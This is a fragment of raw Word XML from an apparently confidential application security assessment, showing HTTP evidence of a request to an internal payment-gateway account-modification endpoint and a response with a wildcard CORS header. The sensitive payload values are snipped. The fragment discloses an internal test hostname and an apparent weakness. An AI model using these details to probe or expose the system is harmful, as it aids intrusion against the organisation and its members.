                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gofundhip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/secure/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/account/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>modifyUser</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3DF9C136" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="31760C6F" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="18C7D3AC" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Accept: application/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>json</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>, text/plain, */*</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="45101CB0" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Accept-Language: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>en-US,en;q</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>=0.5</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1629766A" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Accept-Encoding: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>gzip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>, deflate</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4FB07841" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Type: application/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>json</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>; charset=UTF-8</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="400234D9" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="63EE3B14" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00563090">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00563090" w:rsidRPr="00563090" w14:paraId="4FE4E602" w14:textId="77777777" w:rsidTr="00563090">
              <w:trPr>
                <w:trHeight w:val="1487"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="455D5777" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="28F14AF8" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Fri, 31 May 2019 18:46:32 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4BD5E4A9" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Set-Cookie: </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="67B1F5B1" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>X-Powered-By: Servlet/3.0</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="312B8063" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>Access-Control-Allow-Origin: *</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6CE91DD2" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4629E28C" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00563090">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="1B58A9B4" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00563090">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63166593" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D439D07" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:p w14:paraId="55EC1392" w14:textId="77777777" w:rsidR="004B7AE8" w:rsidRPr="00397EF0" w:rsidRDefault="004B7AE8" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB7B5F5" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00304781">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Global Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECC63C1" w14:textId="77777777" w:rsidR="00DC6FCD" w:rsidRPr="00563090" w:rsidRDefault="00304781" w:rsidP="00304781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>This is a point-in-time assessment of the architecture asserted by the project team and vendor in documentation provided.  As utilization patterns change within Anthem the risk, probability, and amplitude will change.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DC6FCD" w:rsidRPr="00563090" w:rsidSect="004E5E18">
      <w:headerReference w:type="default" r:id="rId41"/>
      <w:footerReference w:type="default" r:id="rId42"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1080" w:bottom="1080" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>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EC21B0" w16cid:durableId="209FCAD8"/>
  <w16cid:commentId w16cid:paraId="68D55D83" w16cid:durableId="209FD121"/>
  <w16cid:commentId w16cid:paraId="5C715F1A" w16cid:durableId="209FD0C2"/>
  <w16cid:commentId w16cid:paraId="045A5399" w16cid:durableId="209FD195"/>
  <w16cid:commentId w16cid:paraId="1845BE52" w16cid:durableId="209FD1D4"/>
  <w16cid:commentId w16cid:paraId="46A309EF" w16cid:durableId="209FD214"/>
  <w16cid:commentId w16cid:paraId="77C0EDDD" w16cid:durableId="209FD22B"/>
  <w16cid:commentId w16cid:paraId="3F722189" w16cid:durableId="209FD238"/>
  <w16cid:commentId w16cid:paraId="187D4E21" w16cid:durableId="209FD257"/>
  <w16cid:commentId w16cid:paraId="1A2AF4CC" w16cid:durableId="209FD2B3"/>
  <w16cid:commentId w16cid:paraId="7CFE0169" w16cid:durableId="209FD2D7"/>
  <w16cid:commentId w16cid:paraId="3789080A" w16cid:durableId="209FD2F2"/>
  <w16cid:commentId w16cid:paraId="1F063AE1" w16cid:durableId="209FD31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0B090" w14:textId="77777777" w:rsidR="0098400D" w:rsidRDefault="0098400D" w:rsidP="00E34EAD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="22F823C2" w14:textId="77777777" w:rsidR="0098400D" w:rsidRDefault="0098400D" w:rsidP="00E34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Arial Bold">
    <w:panose1 w:val="020B07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98F3" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00BC3789" w:rsidRDefault="002B7238" w:rsidP="004E5E18">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4320"/>
        <w:tab w:val="clear" w:pos="8640"/>
        <w:tab w:val="center" w:pos="4770"/>
        <w:tab w:val="right" w:pos="9720"/>
      </w:tabs>
      <w:rPr>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="007B6EEE">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>This document is not for redistribution. Contact the Application Security team.</w:t>
    </w:r>
    <w:r w:rsidRPr="00BC3789">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="00BC3789">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:snapToGrid w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidRPr="00BC3789">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:snapToGrid w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00BC3789">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:snapToGrid w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00BC3789">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:snapToGrid w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00D04492">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:noProof/>
        <w:snapToGrid w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>21</w:t>
    </w:r>
    <w:r w:rsidRPr="00BC3789">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:snapToGrid w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="00BC3789">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:snapToGrid w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r w:rsidRPr="00BC3789">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:snapToGrid w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00BC3789">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:snapToGrid w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00BC3789">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:snapToGrid w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00D04492">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:noProof/>
        <w:snapToGrid w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>28</w:t>
    </w:r>
    <w:r w:rsidRPr="00BC3789">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
        <w:snapToGrid w:val="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C5BB7" w14:textId="77777777" w:rsidR="0098400D" w:rsidRDefault="0098400D" w:rsidP="00E34EAD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1656ABA7" w14:textId="77777777" w:rsidR="0098400D" w:rsidRDefault="0098400D" w:rsidP="00E34E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D16A9" w14:textId="77777777" w:rsidR="002B7238" w:rsidRDefault="002B7238">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:ind w:right="360"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        <w:sz w:val="24"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:tbl>
